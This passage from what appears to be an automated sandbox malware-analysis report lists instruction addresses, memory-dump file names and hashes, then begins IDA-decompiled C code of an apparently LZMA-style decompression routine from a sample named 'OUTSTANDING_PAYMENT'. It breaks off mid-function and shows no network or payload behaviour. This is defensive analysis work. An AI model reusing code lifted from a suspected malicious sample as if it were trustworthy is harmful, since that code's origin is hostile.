                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d61
                                                                                                                        0x00406d64
                                                                                                                        0x00406dd5
                                                                                                                        0x00406dd8
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x00000000
                                                                                                                        0x00406dec
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d6d
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d87
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406d9c
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406dac
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00000000
                                                                                                                        0x00406db1
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406db7
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407020
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x0040702d
                                                                                                                        0x00407030
                                                                                                                        0x00407033
                                                                                                                        0x00407036
                                                                                                                        0x00407039
                                                                                                                        0x0040703b
                                                                                                                        0x00407042
                                                                                                                        0x00407043
                                                                                                                        0x00407045
                                                                                                                        0x00407048
                                                                                                                        0x0040704b
                                                                                                                        0x0040704e
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407053
                                                                                                                        0x00407004
                                                                                                                        0x00407007
                                                                                                                        0x0040700a
                                                                                                                        0x00407014
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x0040708f
                                                                                                                        0x00407092
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x0040706e
                                                                                                                        0x00407071
                                                                                                                        0x00407074
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x00407087
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x00000000
                                                                                                                        0x00407137
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x00000000
                                                                                                                        0x004073c8
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00000000
                                                                                                                        0x00407489
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c7
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00000000
                                                                                                                        0x0040753b
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074eb
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x0040751d
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                        • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                                        • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                        • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
